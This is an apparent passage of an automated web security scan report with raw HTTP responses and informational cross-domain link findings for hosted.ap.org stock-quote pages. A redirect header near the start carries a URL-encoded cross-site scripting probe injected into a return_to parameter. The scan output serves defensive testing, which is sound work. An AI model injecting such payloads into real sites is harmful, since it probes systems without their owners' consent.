Location: https://secure.zvents.com/elx/events_cbs6albany_com/user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=6f4282717780dcc19a72c2c0ec55f078::1ed9edb1f0b57dc67f45ebdf738c5ace
X-Runtime: 5
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:37:18 GMT; HttpOnly
Content-Length: 299

<html><body>You are being <a href="https://secure.zvents.com/elx/events_cbs6albany_com/user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=6f4282717780dcc19a72c2c0ec55f078::1ed9edb1f0b57dc67f45ebdf738c5ace">redirected</a>
...[SNIP]...

17.190. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The page was loaded from a URL containing a query string:

http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE=

The response contains the following links to other domains:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://edge.quantserve.com/quant.js
http://ibd.morningstar.com/AP/Table.css
http://ibd.morningstar.com/AP/morningstar.css
http://ibd.morningstar.com/quicktake/morningstarEN.css
http://im.morningstar.com/im/TheMstarLogo.gif
http://im.morningstar.com/im/dot_clear.gif
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2
http://v11.mivainline.us.miva.com/MIVALine/HighlightKeywords.css
http://www.4info.net/js/auto_jump.js
http://www.4info.net/logon.jsp
http://www.bostonherald.com/
http://www.bostonherald.com/about/contact/
http://www.bostonherald.com/about/home_delivery/
http://www.bostonherald.com/blogs/
http://www.bostonherald.com/business/
http://www.bostonherald.com/entertainment/
http://www.bostonherald.com/jobfind/
http://www.bostonherald.com/mediacenter
http://www.bostonherald.com/mediacenter/browser/
http://www.bostonherald.com/mediacenter/electronic/
http://www.bostonherald.com/mediacenter/history/
http://www.bostonherald.com/mediacenter/tips/
http://www.bostonherald.com/mediakit/online/
http://www.bostonherald.com/mediakit/print/
http://www.bostonherald.com/news/
http://www.bostonherald.com/sports/
http://www.bostonherald.com/track/
http://www.bostonherald.com/wireless
http://www.carfind.com/
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
https://ibd.morningstar.com/im/dot_clear.gif
https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif

Request

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="/homepage.bg">
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News & Opinion</a>
...[SNIP]...
<div id="sports" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tabSelected"><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos & Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">Homefind</a>
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">Jobfind</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2"/></div>
...[SNIP]...

<link rel="stylesheet" type="text/css" href="http://v11.mivaInLine.us.miva.com/MIVALine/HighlightKeywords.css">

<SCRIPT LANGUAGE="JavaScript1.1">
...[SNIP]...
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1" >
<link rel="stylesheet" type="text/css" href="http://ibd.morningstar.com/AP/Table.css" >
<link rel="stylesheet" type="text/css" href="http://ibd.morningstar.com/AP/morningstar.css" >

<script type="text/javascript">
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<input type="text" name="ticker" size=20 value="Enter ticker or name" maxlength=64 onclick="javascript:ClearAPInput()" class=TextTool><img src="http://im.morningstar.com/im/dot_clear.gif" height=1 width=10>
       <input type="image" border=0 src="http://ibd.morningstar.com/im/go.gif" width=24 height=16 align=absmiddle>
...[SNIP]...
<a href="javascript:ToolTopOpenWin('http://www.morningstar.com/')"><img src="http://im.morningstar.com/im/TheMstarLogo.gif" width=166 height=33 border=0></a>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5" width="260"></td>
...[SNIP]...
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="5" width="215"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="70"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="20" width="1"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="10" width="85"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="104"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="104"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="107"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="80"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="80"></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height="10"/></td>
...[SNIP]...
</style>
<link rel="stylesheet" href="//ibd.morningstar.com/quicktake/morningstarEN.css">
<script language="javascript">
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<a href="javascript:footeropenwin('http://www.morningstar.com',0,0)" class=LinkDisc>
           <img src="https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif" width="102" height="28" border="0" /></a>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<div id="adMiddle" style="padding-top:15px">
<IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="AdBottom">
        <IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_bottom ID=i_bottom FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="BottomNav">
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/contact/">Contact us</a>  |  

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/tips/">News tips</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/electronic/">Electronic edition</a>  |  

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/wireless">Herald wireless</a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.191. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The page was loaded from a URL containing a query string:

http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=

The response contains the following links to other domains:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://edge.quantserve.com/quant.js
http://ibd.morningstar.com/AP/TickerLookup.css
http://ibd.morningstar.com/quicktake/morningstarEN.css
http://im.morningstar.com/im/TheMstarLogo.gif
http://im.morningstar.com/im/dot_clear.gif
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2
http://v11.mivainline.us.miva.com/MIVALine/HighlightKeywords.css
http://www.4info.net/js/auto_jump.js
http://www.4info.net/logon.jsp
http://www.bostonherald.com/
http://www.bostonherald.com/about/contact/
http://www.bostonherald.com/about/home_delivery/
http://www.bostonherald.com/blogs/
http://www.bostonherald.com/business/
http://www.bostonherald.com/entertainment/
http://www.bostonherald.com/jobfind/
http://www.bostonherald.com/mediacenter
http://www.bostonherald.com/mediacenter/browser/
http://www.bostonherald.com/mediacenter/electronic/
http://www.bostonherald.com/mediacenter/history/
http://www.bostonherald.com/mediacenter/tips/
http://www.bostonherald.com/mediakit/online/
http://www.bostonherald.com/mediakit/print/
http://www.bostonherald.com/news/
http://www.bostonherald.com/sports/
http://www.bostonherald.com/track/
http://www.bostonherald.com/wireless
http://www.carfind.com/
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
https://ibd.morningstar.com/im/dot_clear.gif
https://ibd.morningstar.com/im/topleft_cornerW.gif
https://ibd.morningstar.com/im/topright_cornerW.gif
https://im.morningstar.com/im/dot_clear.gif
https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif

Request

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:19 GMT
Content-Length: 32594
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="/homepage.bg">
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News & Opinion</a>
...[SNIP]...
<div id="sports" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tabSelected"><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos & Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">Homefind</a>
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">Jobfind</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2"/></div>
...[SNIP]...

<link rel="stylesheet" type="text/css" href="http://v11.mivaInLine.us.miva.com/MIVALine/HighlightKeywords.css">

<SCRIPT LANGUAGE="JavaScript1.1">
...[SNIP]...
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="http://ibd.morningstar.com/AP/TickerLookup.css">
<script language="javascript">
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<input type="text" name="ticker" size=20 value="Enter ticker or name" maxlength=64 onclick="javascript:ClearAPInput()" class=TextTool><img src="http://im.morningstar.com/im/dot_clear.gif" height=1 width=10>
       <input type="image" border=0 src="http://ibd.morningstar.com/im/go.gif" width=24 height=16 align=absmiddle>
...[SNIP]...
<a href="javascript:ToolTopOpenWin('http://www.morningstar.com/')"><img src="http://im.morningstar.com/im/TheMstarLogo.gif" width=166 height=33 border=0></a>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td width=10><img src="https://ibd.morningstar.com/im/topleft_cornerW.gif" width=10 height=24></td>
...[SNIP]...
<td width=10><img src="https://ibd.morningstar.com/im/topright_cornerW.gif" width=10 height=24></td>
...[SNIP]...
<td colspan=3><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td colspan=3><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=20 width=10></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=200></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=20></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=265></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=20></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=50></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif"></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif"></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif"></td>
...[SNIP]...
<td colspan=6><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=20></td></tr>
   <tr><td colspan=6 class=RulerTitle1><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td></tr>
   <tr><td colspan=6 class=RulerTitle2><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=20 width=565></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=100></td>
...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height="10"/></td>
...[SNIP]...
</style>
<link rel="stylesheet" href="//ibd.morningstar.com/quicktake/morningstarEN.css">
<script language="javascript">
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<a href="javascript:footeropenwin('http://www.morningstar.com',0,0)" class=LinkDisc>
           <img src="https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif" width="102" height="28" border="0" /></a>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<div id="adMiddle" style="padding-top:15px">
<IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="AdBottom">
        <IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_bottom ID=i_bottom FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="BottomNav">
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/contact/">Contact us</a>  |  

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/tips/">News tips</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/electronic/">Electronic edition</a>  |  

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>  |  
        <a class="LinksRedNone" href="http://www.bostonherald.com/wireless">Herald wireless</a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.192. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The page was loaded from a URL containing a query string:

http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP707&valid=NO&set=new&view=quote&ticker=

The response contains the following links to other domains:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://edge.quantserve.com/quant.js
http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/cobrand.css
http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/morningstaren.css
http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/quote.css
http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/tabnav.css
http://ibd.morningstar.com/quicktake/standard/client/shell/GetSecList.axd?cn=AP707&ticker=&items=30&pages=10&pageno=0
http://ibd.morningstar.com/quicktake/standard/client/shell/cobrand.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2
http://v11.mivainline.us.miva.com/MIVALine/HighlightKeywords.css
http://www.4info.net/js/auto_jump.js
http://www.4info.net/logon.jsp
http://www.bostonherald.com/
http://www.bostonherald.com/about/contact/
http://www.bostonherald.com/about/home_delivery/
http://www.bostonherald.com/blogs/
http://www.bostonherald.com/business/
http://www.bostonherald.com/entertainment/
http://www.bostonherald.com/jobfind/
http://www.bostonherald.com/mediacenter
http://www.bostonherald.com/mediacenter/browser/
